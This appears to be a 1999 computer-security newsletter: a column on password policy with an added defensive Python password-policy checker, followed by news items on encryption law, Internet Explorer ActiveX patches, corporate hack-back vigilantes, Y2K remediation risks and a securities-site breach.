So now that you have set your password policy, it is time to enforce it. Just telling everyone that their passwords must be six characters or more and contain a mix of letters, numbers, and special characters does not mean that they will do this. While doing a password audit once, I found that some people had no password, some used their login name as their password, while others used the same letter or number six times. So how do you enforce password policy? Windows NT gives you rudimentary tools for enforcing password policy. If you open User Manager for Domains (as administrator, of course), go to the "Policies" menu and choose "Account", you are presented with a properties page for passwords. Here you can set the password length, days until expiration, lockout retries and password history. Let me go over what each of these is for.
Minimum Password Length is somewhat self explanatory. You can set the value for the minimum length a password must be here. If you set it to 6, then each user in that domain must choose a password that is at least six characters long.
Days until expiration or Maximum password age allows you to set the length of time that will pass before a user has to change their password. In high security areas the maximum password age is set for 7 days or even as low as 1 day. For most people somewhere between 30-90 days will suffice.
Account lockout lets you set the maximum number of retries a person has until that account is locked out. This prevents someone from repeatedly trying to guess a user's password. Don't set this number too low. Many administrators set this at 3, but I feel that this is too low. If you mess up on the first try, you only have two more tries before your account is locked. I would set this number to 5 or 6. This gives the user some fudge room while at the same time preventing password guessing by unauthorized individuals.
Password history or Uniqueness prevents the user from choosing the same password over and over. Unless you assign passwords to your users, do not set this value too high. If the user must always choose a completely new password every 30 days, they will run out of password ideas. This, of course, will make your job harder because the users will forget what password they created, making you unlock their account several times a week.
Unfortunately, there is no way to specify that the user must have a mix of letters, numbers, and special characters from within Windows NT. For that kind of control you must use a third party software product to do this. Products like "Password Appraiser" and "Password Policy Enforcer" let you set and enforce a strong password policy across the enterprise.
With Unix or Linux operating systems, the default password policy is very lax. In fact, you can set up a root account with no password at all if you wish. Of course this differs between versions of Unix; some versions are more lax than others. You can set password policies rather easily in *nix with some simple scripts. If you are reasonably proficient in Perl, you can write a simple script that will specify password length, types of characters and password expiration without having to go out and buy a third party solution. If Perl is not your thing, I have provided a link below that has some sample scripts that you can use. Another point to note is that many Unix password files are not very securely encrypted. It would not take much effort to crack the passwords in the passwd file. For this reason you might want to consider other measures to ensure strong password encryption. For Linux you can use the Shadow Password Suite. The Linux Shadow Password Suite gives you strong encryption of your passwd file that resists brute force cracking techniques.
Passwords are the first link in your security chain. If this link is weak, then your whole chain is broken and no combination of firewalls, proxies or other measures will keep your network secure. Focus on your passwords first and then you can add other security tools as you need them.
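The column above suggests writing a small script to enforce its rules (length, character mix, no personal names or numbers, no dictionary words, password history and expiration). The following is an added example, not code from the zine or from the column's author, that implements such a checker in Python rather than the Perl the column mentions. The account fields, the tiny word list, the dates and the rule thresholds (history depth of 5, maximum age of 60 days, within the column's 30-90 day range) are constructed for the demonstration.

```python
# Added example, not part of the HWA zine or the column's own material: a
# password policy checker applying the rules listed in the article. The
# Account fields, word list, thresholds and dates are constructed for the demo.
import re
import string
from dataclasses import dataclass, field
from datetime import date

MIN_LENGTH = 6       # the article's minimum length
HISTORY_DEPTH = 5    # how many previous passwords may not be reused (assumed)
MAX_AGE_DAYS = 60    # maximum password age, inside the article's 30-90 day range

# Constructed mini word list; a real deployment loads a full dictionary file.
DICTIONARY = {"password", "letmein", "welcome", "dragon", "monkey", "secret"}


@dataclass
class Account:
    """Per-user data the policy needs: the things the article says never to use."""
    login: str
    first_name: str
    last_name: str
    pet_name: str = ""
    phone: str = ""
    house_number: str = ""
    bank_pin: str = ""
    previous: list = field(default_factory=list)  # recent passwords, newest last


def _digits(s: str) -> str:
    """Keep only the digits, so 555-0199 and 5550199 compare equal."""
    return re.sub(r"\D", "", s)


def check_password(password: str, acct: Account, dictionary=DICTIONARY) -> list:
    """Return the list of violated rules; an empty list means the password passes."""
    problems = []
    low = password.lower()

    if len(password) < MIN_LENGTH:
        problems.append("too short")

    has_alpha = any(c.isalpha() for c in password)
    has_digit = any(c.isdigit() for c in password)
    has_special = any(c in string.punctuation for c in password)
    if not (has_alpha and has_digit and has_special):
        problems.append("needs letters, digits and special characters")

    # The audit finding from the article: the same character six times over.
    if password and len(set(password)) == 1:
        problems.append("single repeated character")

    # Any name at all, the login, or any of the user's own numbers.
    names = {n.lower() for n in (acct.login, acct.first_name, acct.last_name, acct.pet_name) if n}
    if low in names:
        problems.append("equals a name or login")
    numbers = {_digits(n) for n in (acct.phone, acct.house_number, acct.bank_pin)} - {""}
    if _digits(password) and _digits(password) in numbers:
        problems.append("equals a personal number")

    # Dictionary attack and its hybrid form (word plus digits, like jim1952):
    # strip everything but letters and look the remaining core up.
    core = re.sub(r"[^a-z]", "", low)
    if core in dictionary:
        problems.append("built on a dictionary word")

    if password in acct.previous[-HISTORY_DEPTH:]:
        problems.append("reused a recent password")

    return problems


def password_expired(last_changed, today, max_age_days: int = MAX_AGE_DAYS) -> bool:
    """Maximum password age, like NT's account policy. Accepts dates or ISO strings."""
    if isinstance(last_changed, str):
        last_changed = date.fromisoformat(last_changed)
    if isinstance(today, str):
        today = date.fromisoformat(today)
    return (today - last_changed).days >= max_age_days


if __name__ == "__main__":
    # Constructed account; the sample passwords are the ones the article discusses.
    jim = Account(login="jsmith", first_name="Jim", last_name="Smith", pet_name="Rex",
                  phone="555-0199", house_number="42", previous=["Rex!2019", "Smith#01"])
    for pw in ["kgjhuy", "jim1952", "j1i9m52", "jim&1*9!52#", "555-0199", "aaaaaa", "secret99!"]:
        print(f"{pw!r:16} -> {check_password(pw, jim) or 'OK'}")
    print("expired:", password_expired("1999-08-01", "1999-10-03"))
```

Note that the checker only sees the plaintext at the moment the user picks a password, which is where a policy hook belongs; the history list is kept in plaintext here purely for the demonstration, and a real enforcer would compare against stored hashes.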
Activists Pull Stunt To Show Crypto Holes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The British Home Secretary has been sent a potentially incriminating e-mail by a pressure group trying to show that a draft e-commerce law could see innocent people falsely imprisoned.
Stand -- a group campaigning against controversial measures in the Electronic Communications Bill to govern the supply and use of encryption -- said on Monday it had sent Jack Straw an e-mail containing a confession to a crime. This had been encrypted with a key created in Straw's name and registered on international public key servers.
"The police may come and demand that you supply the key required to make this message intelligible," the letter said. "If you fail to do so, you would be committing an offense under the [Electronic Communications] Bill rendering you liable to imprisonment for up to two years.
"The fact that you don't possess this key won't help you unless you can prove that you don't have it. I wish you well in proving that it isn't hidden away on a disk in your secretary's home, or squirreled away on the Internet somewhere."
The group, supporting the view of lawyers who have spoken on the subject, argued the draft legislation would reverse the "innocent until proven guilty" principle.
Last week, Nicholas Bohm of the Law Society told a conference the bill would reverse the burden of proof and breach the European Convention on Human Rights that protects against self-incrimination.
At the same Scrambling For Safety 3.5 conference, the new e-commerce minister Patricia Hewitt defended the Bill saying its requirements were no different than the police being able to develop a roll of film found in a defendant's home when searched.
But Bohm argued the bill's powers were closer to the analogy of forcing the accused to develop a film themselves if it required special processing and the police could not develop it. In current law, suspects do not commit a crime if they decline to do this. He also used the analogy of a booby-trapped safe, where the contents could be destroyed if it was opened. The police could not currently force a suspect to deactivate any such privacy measures.
"Even if you can prove that you don't have it, you would still be liable for imprisonment unless you give information to the police that enables them to decrypt the key," the letter said. "Unfortunately for you, this is impossible, because we've destroyed all copies."
A Home Office spokeswoman said the department didn't believe the bill would reverse the burden of proof as the prosecution would still have to prove guilt beyond a reasonable doubt in all cases. She conceded that confusion may have arisen from putting specific defenses on the face of the Bill. Such as: "If you don't have the key, but you give as much information as possible about how it could be obtained," she said.
Of the letter, the spokeswoman said people could be falsely incriminated in this way today without the Bill and without encryption being involved.
"We think that's almost a red herring."
U.S., Network Solutions Reach Agreement
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Internet address registrar Network Solutions and the U.S. Commerce Department have finally reached an agreement to offer competitors long-term access to the company's domain name database, a source familiar with the deal said Monday.
Following almost a year of negotiations, Herndon, Va.-based Network Solutions has agreed to let competing companies register new Internet addresses for a fee of $6 per year, well below the $35 per year Network Solutions charges its customers.
The company will continue to manage the database of already registered names for at least four more years, under the agreement.
In essence, other companies will be able to compete for the "retail" business of registering new domain names, while Network Solutions will continue to run the "wholesale" business of keeping track of already registered names and informing Internet servers how to route traffic.
During an ongoing, several month "test" of competition, a handful of companies were allowed to register Internet address names into the Network Solutions database for a fee of $9 per name, per year.
Network Solutions has also agreed to be overseen, as its new competitors are, by the Internet Corporation for Assigned Names and Numbers (ICANN), a California nonprofit tapped last year by the Commerce Department to administer the domain name system.
The agreement is to be announced at a Commerce Department press conference on Tuesday.
Under an agreement with the government that expired last year, Network Solutions was the only company permitted to register Internet domain names, the addresses of websites, e-mail, and other Net resources, that ended with the popular .com, .net and .org suffixes.
But the Clinton administration decided to privatize the system, handing the reins over to ICANN last November and earlier this year, letting firms compete with Network Solutions for the first time.
Since then, ICANN has struggled to get off the ground, running into criticism from Internet users and members of Congress for making decisions behind closed doors and proposing to fund itself with a fee of $1 per domain name.
And Network Solutions battled the Commerce Department and Congress as it asserted ownership of the list of more than 5 million domain names it registered before the onset of competition.
On Monday, a spokesman for Network Solutions declined to comment.
A spokesman for the Commerce Department said Secretary William Daley would make a statement on the domain name situation at Tuesday's press conference.
Network Solutions stock rose 5 7/8 to 72 13/16 in trading of over 1.2 million shares on the Nasdaq on Monday.
CMGI to acquire free ISP 1stUp
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Internet holding company CMGI said today that it has agreed to buy free Internet service wholesaler 1stUp.com, in a move that solidifies the company's moves toward creating a full-service Web access and content powerhouse.
San Francisco-based 1stUp is the same company that provides CMGI affiliate AltaVista with its free ad-subsidized Internet access service, launched in August. The start-up also has signed a deal to provide its free service to Bolt.com, a teen-oriented Web portal.
The deal comes as CMGI has been moving to more closely integrate its various Web properties in hopes of taking on established Web players like Yahoo and America Online.
Microsoft - ActiveX Holes
~~~~~~~~~~~~~~~~~~~~~~~~~
Microsoft has patched a handful of security holes in its Internet Explorer browser and ActiveX technology that made computers vulnerable to attack by malicious Web site operators.
The first patch takes care of a problem with IE's ImportExportFavorites feature, which lets users transfer lists of frequently visited Web addresses. The bug lets a malicious Web site operator run executable code on the computer of someone who visits that Web site.
"The net result is that a malicious Web site operator potentially could take any action on the computer that the user would be capable of taking," Microsoft warned in a security alert earlier this month.
Microsoft's patch eliminates the problem, the company said today. Versions 4.01 and 5.0 of IE are at risk. The patch also fixes a related problem involving ActiveX, Microsoft's technology for bringing interactive scripts and controls to Web pages.
ActiveX has long been a security headache for Microsoft. Critics of the technology fault its "trust-based" security model, in which signatures let users choose whether to download an ActiveX control. With this system, users are expected to judge that controls signed by well-known companies like Microsoft are less likely to be maliciously designed than those signed by unknown entities.
In the latest discovery, Microsoft identified eight ActiveX controls it said were "incorrectly marked as 'safe for scripting,'" a designation that assures users that they can download the controls without posing any security risk to their own computers. The controls could be manipulated for malicious ends, however, Microsoft said.
The controls in question are Kodak Image Edit: Wang Imaging; Kodak Image Annotation: Wang Imaging; Kodak Image Scan: Wang Imaging; Kodak Thumbnail Image: Wang Imaging; Wang Image Admin: Wang Imaging; HHOpen: HTML help files; Registration Wizard: Internet Explorer Product Registration; and IE Active Setup: Internet Explorer Setup.
Microsoft credited Bulgarian bug hunter Georgi Guninski with discovering the so-called ImportExportFavorites bug. Richard Smith of Pharlap Software and Australian bug hunter Shane Hird were recognized for discovering the ActiveX problems.
Privacy Groups Wary Of Encryption Reforms
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Privacy groups and some lawmakers said Tuesday that they are concerned about legislation the Clinton administration has proposed that gives law enforcement potentially wider berth to access secure data to balance the relaxation of encryption-export controls.
Representatives from the Justice, Defense, and Commerce Departments and the White House briefed reporters and the Congressional Internet Caucus Advisory Committee, a bipartisan group of lawmakers, on the need to let law enforcement access encrypted material in criminal investigations. The White House on Sept. 16 relaxed controls on data-scrambling products that are mass marketed to any country except those seven considered to support terrorism after a one-time technical review. The exact wording of the new regulation will be published by Dec. 15. Industry praised the reforms because the about-face in the administration policy would let U.S. companies compete globally in strong encryption products. However, the reform package also includes draft legislation, the Cyberspace Electronic Security Act, that outlines when and how law enforcement may access secure data.
"We have deep concerns with the draft we've seen," said Jerry Berman, executive director of Center for Democracy and Technology, a privacy group here. The standards for court-ordered access to decryption keys and non-disclosure agreements protecting proprietary data gleaned in the course of investigations are ambiguous, he said. "The legislation should be written very clearly what sources and methods law enforcement and national security will use," Berman said.
The White House has sent the cyberspace security legislation to Capitol Hill and it can be introduced any time, he said. This legislation deserves many hearings and will originate in the Senate Judiciary Committee, Berman said.
The encryption reforms will move forward by Dec. 15 whether the controversial legislation has been passed or not, said Commerce Under Secretary William Reinsch, head of the Bureau of Export Administration. Before the administration's lifting of encryption controls, legislation in the House of Representatives, the Security and Freedom Through Encryption, or SAFE Act, which would eliminate controls, was close to passage. "The administration's announcement doesn't let Congress off the hook. We still need legislation that provides permanent, significant guidelines for the FBI to get a key," said Sen. Patrick Leahy (D-Vt.), co-chair of the Internet caucus.
The author of the SAFE Act, Rep. Bob Goodlatte (R-Va.), said the bill, which enjoys broad congressional support, was ready for a full House vote. "Whether it goes depends on the details of the administration's rule," Goodlatte said.
The cyberspace security legislation will protect personal and industry privacy while also recognizing the serious problem of criminals hiding evidence, said Jim Robinson, Justice's assistant attorney general for the criminal division. The legislation gives special protections to those who deposit their decryption key with a third party, he said. "We will not let the public be left on the cutting floor," Robinson said. Peter Swire, the White House chief counsel for privacy called the cyberspace bill a tailored response to law enforcement. "We will get the rule down right," Swire said.
Wild Wild Web
~~~~~~~~~~~~~
Cybercrime units are overworked and understaffed, so many Netizens are taking matters into their own hands.
You're a bank, and you think someone is trying to hack into your computer system. Where do you turn? Law enforcement offers little help - agencies are overworked and understaffed, and you risk public embarrassment if word gets out.
Apparently, there's another option. You might decide to take the law into your own hands. Which means you might call a man known as Lou Cipher. "Lou" says he's spent the last 10 years working for Fortune 500 companies, turning the tables on computer intruders, performing what some have called vigilante justice in cyberspace.
Cipher, a pseudonym of his own choosing, says he retired from a 15-year career as a computer consultant in 1990. By then, he had already started his life as a hacker for hire.
In the past 10 years, he says he's been hired over 50 times by big U.S. firms - mostly financial institutions - looking to get hackers off their back. He says fees now start at $100,000 for new clients, "with no promises of success."
He and his "associates" often take on their tasks by "bridging from the virtual world to the physical." That means breaking into the same computers a hacker has hijacked, chasing the trail through cyberspace, obtaining a real-world address and paying a real-life visit.
Cipher says he's even broken into homes and stolen hackers' computers to teach them a lesson. He gives the machines back after recovering any stolen information.
"I am engaged in the protection and regaining of stolen assets because of the inability of government to provide adequate protection and prosecution," Cipher says. And that includes, he admits, breaking laws himself. His defense: "It's self-defense.
"You can call the FBI right now and say a person just got off with a database of customers. What is the FBI going to do?"
Giving Feds the fits
The increase in technology crime has given fits to law enforcement agencies who find they don't have the necessary skills to keep up with an army of new criminals, emboldened by the anonymity the Net provides. Even when federal agents act, justice can be slow. It took almost six months for the recent nationwide FBI hacker "crackdown" to produce an arrest.
So Cipher, and some say other such corporate vigilantes, take the law into their own hands.
Still, to call breaking into someone else's home an act of corporate self-defense would likely be considered a stretch in court.
"I don't see that argument holding water," said cyberlaw expert Dorsey Morrow. "It would be a dangerous thing for a corporation to do. The potential liability is incredible."
Particularly if vigilantes hit the wrong target. That's the concern of computer consultant Brian Martin, who maintains the popular hacker information site "attrition.org."
"So Lou and his gang roll up on this house and know the intruder dialed from there. They bust in and terrorize an elderly couple. Oops!" Martin said. "How could they have been so wrong? Because the hacker used a laptop from the phone box outside their house. That scenario scares me."
First identified in a column
Cipher was first identified in public when information warfare expert Winn Schwartau used his name in a column for Network World in January. Claims of baseball bat-wielding vigilantes stirred skepticism in the underworld, and neither Martin nor Space Rogue, who maintains the Hacker News Network Web site, say they've ever heard of a hacker being visited by any private security agent.
"Considering the size of this community, if he has visited more than 10 people I am sure word would have leaked," Rogue said. But he added "There have been rumors floating around for a few years of corporations with their own internal security taking matters into their own hands."
That has law enforcement agencies anxious enough to discuss the matter publicly. Jim Christy, special agent for the Department of Defense, debated Schwartau on the topic at the Infowarcon conference earlier this month.
"I have no problem with identifying a bad guy and warning them," said Christy, who for 11 years was chief of computer crime for the Air Force Office of Special Investigations. "That's a legitimate self-defense option for a victim. But it crosses the line when you violate the rights of others. ... It crosses the line when you break the law."
Rely on informants
He said the key to making law enforcement agencies more effective is for more victims of computer crime to come forward. Without a backlog of cases, agents can't demand additional resources. Companies that hire vigilantes, or who simply brush computer crime under the rug out of fear of embarrassment, only make the situation worse, he said.
But that won't help victims today, Schwartau said, and they need somewhere to turn.
"The legal community says it's blatantly illegal," Schwartau said. Schwartau, who once shared ownership of a Web site venture with Cipher, says the legal community is being closed-minded on the topic. "Is disarming an adversary illegal? ... You're allowed to do repossession, which is stealing your own possessions back."
When MSNBC visited Cipher at his daytime consulting job, where he is a security adviser for a large U.S. brokerage company, Cipher said he painstakingly verifies his targets and admits sometimes he doesn't catch them. Most of the examples he offered involved pre-emptive strikes against hackers "probing" financial networks - the cyber equivalent of "casing" a bank before a robbery.
Such pre-emptive strikes have taken him as far as Eastern Europe, and even India, he said. In one case, he said college-aged hackers in the Czech Republic were worming their way toward a bank's credit card database. Another incident involved hackers in India trying to fake an electronic funds transfer.
But sometimes, he said, he does his work entirely over the Internet. Last month he says his agents broke into the computer of a man who held a vast database of stolen credit cards. They scrambled the card numbers to render them useless.
Many more of his stories are less dramatic, involving a polite curbside or coffeehouse conversation with a hacker. Often, that's enough, he says.
"They are very surprised when we come to visit, when we bridge to the physical world," he said.
Desperate countdown to ready Cold War remnants for Y2K
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
All but one of the seven Cold War-era "hot lines" have year 2000 glitches, and the United States and Russia are hurrying to correct them, a top Pentagon official said today.
The Clinton administration is giving Moscow Y2K-compliant software and computers "to correct program deficiencies in outage reporting, monitoring, and channel reroute operations," assistant secretary of defense Edward Warner said.
He made the remarks in testimony prepared for the Senate Special Committee on Y2K. The panel is studying pitfalls of the coding glitch that could cause ill-prepared computers--and the operations they control--to fail on January 1 with the changeover from 1999 to 2000.
To avoid possible misunderstandings during the date change, the United States and Russia agreed on September 13 to set up a joint "Center for Y2K Strategic Stability" at Peterson Air Force Base in Colorado Springs, Colorado.
Sharing information
In addition to sharing missile launch information, Russian and U.S. officers staffing the post will be able to talk through any other "defense-related problems that emerge" during the calendar rollover, Warner said. He said the Pentagon had begun the process of procuring updated equipment for the six of seven hot lines found to have problems, "and while the schedule is tight, we are confident that the fixes will be installed and tested by December."
"Assured communications between U.S. and Russian leaders is a priority at all times, and of particular concern over the millennium date change," said Warner, who is responsible for strategy and threat reduction.
The United States and Russia each keep roughly 2,500 nuclear-tipped missiles pointed at one another on hair-trigger alert despite the collapse of the old Soviet Union in December 1991, ending the Cold War.
Immediate communication
They began installing the seven direct communications links, popularly known as hot lines, at the height of the Cold War in the 1960s to guarantee immediate communication when needed.
Among these are: direct links between the two presidents; a link between the secretary of state and the foreign minister; and one connecting the nuclear risk-reduction centers on both sides. A secure communications link also is key to operations of the temporary Center for Y2K Strategic Stability.
Russia put on hold most Y2K-related fixes and other technical cooperation with the United States after U.S.-led NATO forces began a 78-day air war in March in Yugoslavia, a Russian ally.
When talks resumed in August, Russia agreed with U.S. recommendations regarding "Y2K vulnerabilities in current hot line architecture," Warner said.
He said Y2K problems had been identified at a Russian ground station as well as in commercial software used on both sides, "which would prevent full operation of six of the seven direct communications links over the Y2K transition."
Among the contingency plans now being discussed were the possible addition of "backup analog circuits, additional secure phone/facsimile capability, and installation of emergency INMARSAT (mobile satellite communications) devices on both sides," Warner said.
Critical issues
Another "critical" Y2K-related issue is the security of Russia's nuclear stockpiles, Warner told the committee headed by Utah Republican Robert Bennett and Connecticut Democrat Chris Dodd.
"Of special concern are the security systems in nuclear storage sites affecting access control, perimeter monitoring, fire detection and suppression, and warhead inventory and accountability," he said.
Forces of the 12th Main Directorate of the Russian Defense Ministry, responsible for the storage and security of non-deployed Russian nuclear warheads, are to maintain a "special Y2K monitoring and control center" at each of their 50 main nuclear storage sites in December through March 2000, Warner said.
Under its so-called Cooperative Threat Reduction program, the United States has spent millions of dollars since the end of the Cold War aimed at preventing Russian nuclear material from being purchased or stolen by guerrilla groups or third countries.
Computer wizards crack code in worldwide challenge
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Computer wizards from 20 countries joined together to crack a high-powered secret code, winning a prestigious prize from a Canadian software firm seeking to establish a worldwide standard for encrypting data used in Internet transactions.
A team led by Robert Harley, of France's National Institute for Research in Computer Science and Control (INRIA), won the five-thousand-dollar award after a 40-day effort to solve the puzzle, the firm Certicom said Wednesday.
Harley coordinated a mammoth calculating programme that occupied 195 researchers in 20 countries, using 740 computers to run 130,000 billion computations, it said in a press release received here.
The challenge centered on so-called "public key" cryptography.
Under this, two computers that have never previously communicated agree on a joint key that will decipher coded data.
The goal is to ensure that the key cannot be decoded, even if someone taps into the traffic -- thus ensuring that credit-card numbers and other data sent in electronic commerce cannot be intercepted and misused.
Certicom's challenge related to a logarithmic programme, called elliptic curve cryptography (ECC), that it hopes to have established as an Internet standard for encrypted codes.
It contends that ECC, a newcomer to the field, is more secure than more widely-used rival concepts, uses up less computer memory and gobbles up less bandwidth in the communications link.
Specifically, cryptographers were asked to crack a 97-bit key that was encoded in ECC. They took twice as much computing power to achieve the goal as a 512-bit key in a rival encryption made by RSA Data Security, Certicom said.
The result also showed that "strong security" can be achieved only when a much more powerful key -- a minimum of 163 bits in ECC code -- is used, Certicom said.
The code-crackers included researchers in Australia, Austria, Britain and the United States.
They have agreed to donate 4,000 dollars of the prize money to the Free Software Foundation, an organisation that encourages the creation of free software.
The remaining 1,000 dollars will go to an Australian member of the team, Paul Bourke, who made the breakthrough in the calculation. Bourke used computers at Australia's Swinburne University that are mainly used for studying pulsars.
U.S. finds malicious code changes in Y2K "fixes"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Malicious changes to computer code under the guise of Year 2000 software fixes have begun to surface in some U.S. work undertaken by foreign contractors, the top U.S. cybercop said yesterday.
"We have some indications that this is happening" in a possible foreshadowing of economic and security headaches stemming from Y2K fixes, Michael Vatis of the Federal Bureau of Investigation told Reuters.
Vatis heads the interagency National Infrastructure Protection Center (NIPC), responsible for detecting and deterring cyberattacks on networks that drive U.S. finance, transport, telecommunications, and other vital sectors.
A Central Intelligence Agency officer assigned to the NIPC said recently that India and Israel appeared to be the "most likely sources of malicious remediation" of U.S. software.
"India and Israel appear to be the countries whose governments or industry may most likely use their access to implant malicious code in light of their assessed motive, opportunity, and means," the CIA officer, Terrill Maynard, wrote in the June issue of Infrastructure Protection Digest.
A significant amount of Y2K repair is also being done for U.S. companies by contractors in Ireland, Pakistan, and the Philippines, according to Maynard. But they appear among the "least likely" providers to jeopardize U.S. corporate or government system integrity, although the possibility cannot be ruled out, he wrote.
Thousands of companies in the United States and elsewhere have contracted out system upgrades to cope with the anticipated Y2K glitch, which could scramble computers when 1999 gives way to 2000.
The CIA declined to comment on Maynard's article. Referring to it, Vatis said, "This is our effort to [give] the public information that hopefully can be useful to people."
Vatis, interviewed at FBI headquarters, said that so far "not a great deal" of Y2K-related tampering had turned up.
"But that's largely because, No. 1, we're really dependent on private companies to tell us if they're seeing malicious code being implanted in their systems," he said.
In reporting evidence of possible Y2K-related sabotage of software, Vatis confirmed one of the worst long-term fears of U.S. national security planners.
"A tremendous amount of remediation of software has been done overseas or by foreign companies operating within the United States," Vatis said.
He said it was "quite easy" for an outsider to code in ways of gaining future access or causing something to "detonate" down the road. This could expose a company to future "denial of service attacks," open it to economic espionage, or leave it vulnerable to malicious altering of data, Vatis said.
The Senate Y2K Committee, in its final report last week, described the issue as "unsettling."
"The effort to fix the code may well introduce serious long-term risks to the nation's security and information superiority," said the panel headed by Sens. Robert Bennett (R-Utah) and Chris Dodd (D-Connecticut).
Vatis, in testimony before the Y2K panel in July, warned that contractors could compromise systems by installing "trap doors" for anonymous access.
By implanting malicious code, he said, a contractor could stitch in a "logic bomb" or a time-delayed virus that would later disrupt operations. Another possible threat is the insertion of a program that would compromise passwords or other system security, he said.
The Senate Y2K Committee said the long-term consequences could include increased foreign intelligence collection and espionage activity, reduced information security, a loss of economic advantage, and increased infrastructure vulnerability.
Financial firms create Net crime watch
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The Treasury Department, major banks, and investment firms today inaugurated an Internet crime watch center that's intended to share confidential information on cyberthreats to the financial industry.
The Financial Services Information Sharing and Analysis Center is intended to detect attacks from hackers and others on computer systems, and to provide rapid and anonymous notification between banks and other institutions when there is a threat.
"New types of crime require new types of solutions," Treasury Secretary Lawrence Summers said.
Citigroup, Bank of America, Merrill Lynch, J.P. Morgan, and mutual fund giants Vanguard and Fidelity are among the program participants. The firms are prohibited from sharing confidential customer information.
A survey by the Computer Security Institute found that 64 percent of the companies it questioned reported security breaches to computer systems in 1998, up from the number of firms reporting breaches in 1997, Summers said.
"As damaging as these attacks have been, the vast majority has been conducted by disgruntled individuals," Summers said. "We face a future, though, where criminals, terrorists, or even nation states may use the same tools in a more organized way for darker purposes."
President Bill Clinton, in an executive order issued in May 1998, directed the Treasury to pursue the project. The center itself is funded by the participating banks and financial institutions and managed by a private contractor.
Other federal agencies are participating in the effort. "This is a step in the right direction," said Arthur Levitt, chairman of the Securities & Exchange Commission. "It's a whole new world in terms of security."
The program will also help banks coordinate information during the Year 2000 computer rollover, according to Federal Reserve Governor Roger Ferguson. "The creation of the center couldn't come at a more opportune time," Ferguson said in a printed statement.
Last month, computer security product maker Network Associates warned that a computer virus that deletes a computer user's files was spreading through computer systems at major financial institutions.
The bug, dubbed the "Thursday" virus, is programmed to delete files on December 13, 1999, Network Associates said. The virus attacks Microsoft Windows Word 97 files. Users won't know they are infected until December 13, the company said.
The problem isn't restricted to the financial industry or the United States. Just today, Electrabel, Belgium's biggest electricity company, said it successfully warded off an attempt by a computer hacker to infiltrate its system.
Police are investigating the incident, which follows successful computer system break-ins in Belgium at Fortis Bank and at Belgacom's Skynet Internet service in August by a hacker who dubbed himself "Redattack."
SEC investigates NetRoadshow security breach
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Yahoo's NetRoadshow unit discovered a security breach that could have let unauthorized Internet users see information about securities offerings, drawing questions from regulators about the cause of the problem.
NetRoadshow is a pioneer in the business of using the Internet to broadcast sessions that companies hold for institutional investors before stock and bond offerings. Only financial institutions and other sophisticated investors with passwords are supposed to have access to the online meetings, known as roadshows.
Until yesterday afternoon, however, anyone could view parts of sessions that the company has broadcast by entering the company's Web site through an Internet address that NetRoadshow's employees use to make technical changes to the site.
The company said the problem was caused by human error. About a dozen people had gotten into the system yesterday before NetRoadshow found out about the problem and blocked access, the company said. A Yahoo official said the company doesn't know how long the system had been open.
"The problem was resolved immediately yesterday when we found out about it," said Yahoo spokeswoman Sherry Manno. "The breach occurred in our system that receives transferred files and is structured for internal use, not the system investors use."
The Securities and Exchange Commission, which lays out rules for companies issuing stock and limits the audience of both traditional face-to-face road shows and online sessions, said it learned about the security breach yesterday and plans to talk to NetRoadshow about the issue.
"We're going to ask questions about what's going on," said SEC deputy corporation finance director Michael McAlevey. "If it was an inadvertent technical problem, it's less of a concern to us than if it was intentional."
SEC rules seek to prevent executives from hyping their business expectations before an offering or discussing the company beyond the information it has included in its prospectus, which is available to the public. The SEC allows road shows--where underwriters and issuers orally describe the company and try to build interest in the stock before pricing the offering--because they involve a limited audience of sophisticated investors.
The SEC gave its blessing to the Internet-transmitted road show in 1997, when the agency's staff sent "no action" letters to NetRoadshow and the MSNBC cable network, a joint venture of Microsoft and General Electric's NBC television network. They had requested approval to broadcast road shows over the Internet or via MSNBC's Private Financial Network.
The SEC said it wouldn't recommend charges for transmitting the sessions over the Internet, though the agency reserved the right to look at the issue again in the future.
In the July 30, 1997, letter to NetRoadshow, the SEC said: "Since regulatory responses to legal issues raised by technological developments may evolve, you should be aware that this no-action position may be reevaluated in the future."
NetRoadshow was acquired in March by Broadcast.com, which then was bought by Yahoo in July.
Bloomberg, the parent of Bloomberg News, competes with NetRoadshow and several other firms in the business of transmitting road show presentations.
Court to revisit encryption ruling
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
A U.S. federal appeals court will reexamine a trial court's decision to lift U.S. government restrictions on the export of encryption technology.
The 9th U.S. Circuit Court of Appeals withdrew a May decision by a panel of three of its judges, which had endorsed the trial court ruling. That indicates that a majority of the active 9th Circuit judges have reservations about the opinion or feel the encryption issue is significant enough to be revisited.
In May, the panel of 9th Circuit judges concluded that the federal government could not limit professor Daniel J. Bernstein's efforts to distribute encryption software.
Many companies, such as Network Associates, have been prevented by U.S. law from selling data-scrambling technology overseas.
Earlier this month, it was reported that the Clinton administration is easing restrictions on data-scrambling technology, clearing the way for Network Associates and other companies to sell the hardest-to-crack encryption technology.
Microsoft Patches IE Security.....Again
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Latest fix eliminates ways that site operators can control your PC.
Microsoft claims to have really done it this time. The company promises that it has completely eliminated the security problems that existed with Internet Explorer with the release of an updated patch for the browser software.
An initial patch announcement was made on September 10, but the patch available as of late last week is more far-reaching, Microsoft said in a statement posted Friday on its security Web site.
The security holes in Internet Explorer were discovered earlier this month. The patch eliminates the "ImportExportFavorites" vulnerability, which affected computers connected to the Internet, Microsoft says.
The security hole made it possible for a Web site operator to carry out any functions that visitors to a Web site could do on their own computers, such as deleting or modifying files or reformatting the hard drive. It derived from a feature in IE 5 that lets users export a list of their favorite Web sites to a file, or import a file with a list of favorite Web sites.
The new patch also plugs security holes that resulted from several ActiveX controls, Microsoft says. These existed both in versions 4.01 and 5 of Internet Explorer.
